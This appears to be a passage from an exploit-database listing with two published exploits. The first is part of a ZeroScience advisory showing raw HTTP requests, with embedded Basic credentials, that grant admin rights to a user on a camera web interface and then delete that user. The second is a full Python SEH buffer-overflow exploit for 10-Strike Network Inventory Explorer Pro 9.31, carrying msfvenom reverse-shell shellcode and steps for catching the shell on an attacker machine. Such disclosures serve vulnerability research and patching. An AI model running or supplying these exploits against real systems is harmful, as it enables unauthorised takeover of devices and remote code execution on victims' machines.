the 'admin' userType, successfully adding a second administrative account. 
Tested on: App-webs/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5688 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php 27.10.2021 -- Make user ID 3 an Administrator: -------------------------------- PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1 Host: 192.168.1.1 Content-Length: 556 Cache-Control: max-age=0 Accept: */* X-Requested-With: XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close <?xml version='1.0' encoding='utf-8'?><UserPermission><id>3</id><userID>3</userID><userType>admin</userType><remotePermission><playBack>true</playBack><preview>true</preview><record>true</record><ptzControl>true</ptzControl><upgrade>true</upgrade><parameterConfig>true</parameterConfig><restartOrShutdown>true</restartOrShutdown><logOrStateCheck>true</logOrStateCheck><voiceTalk>true</voiceTalk><transParentChannel>true</transParentChannel><contorlLocalOut>true</contorlLocalOut><alarmOutOrUpload>true</alarmOutOrUpload></remotePermission></UserPermission> HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:13:56 GMT Server: App-webs/ Connection: close Content-Length: 238 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Custom/SelfExt/UserPermission/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus> Delete Administrator user ID 3: ------------------------------- DELETE /PSIA/Security/AAA/users/3 HTTP/1.1 Host: 192.168.1.1 Cache-Control: max-age=0 Accept: */* X-Requested-With: 
XMLHttpRequest If-Modified-Since: 0 Authorization: Basic aTNhZG1pbjppM2FkbWlu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Origin: http://192.168.1.1 Referer: http://192.168.1.1/doc/setup.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin Connection: close HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 14:20:17 GMT Server: App-webs/ Connection: close Content-Length: 213 Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <ResponseStatus version="1.0" xmlns="urn:psialliance-org"> <requestURL>/PSIA/Security/AAA/users/3</requestURL> <statusCode>1</statusCode> <statusString>OK</statusString> </ResponseStatus>
  25. # Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH) # Date: 2021-10-31 # Exploit Author: ro0k # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Version: 9.31 # Tested on: Windows 10 x64 Education 21H1 Build 19043.928 # Proof of Concept: # 1.Run python2 exploit.py to generate overflow.txt # 2.Transfer overflow.txt to the Windows 10 machine # 3.Setup Netcat listener on attacker machine # 4.Open 10-Strike Network Inventory Explorer Pro # 5.Select Computers tab from the uppermost set of tabs # 6.Select From Text File option # 7.Open overflow.txt # 8.Receive reverse shell connection on attacker machine! #!/usr/bin/env python import struct charslist = "" badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c] for i in range (0x00, 0xFF+1): if i not in badchars: charslist += chr(i) #msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c" shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1" "\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37" "\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37" "\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51" "\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6" "\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45" "\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a" "\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0" "\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa" "\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b" "\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18" "\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b" "\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07" "\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85" "\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14" 
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8" "\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61" "\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1" "\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9" "\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87" "\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6" "\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e" "\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d" "\x51\x55\x3e\xf2\x52\x7c") #pattern_offset.rb -l 250 -q 41316841 offset = 213 #nasm > jmp short 8 nseh = "\xeb\x06\x90\x90" junk = "A" * (offset - len(nseh)) #0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll) seh = struct.pack("<I", 0x61e012f6) #metasm > sub esp,0x10 subesp10="\x83\xec\x10" payload = shellcode buffer = junk + nseh + seh + subesp10 + payload f = open("overflow.txt", "w") f.write(buffer) f.close()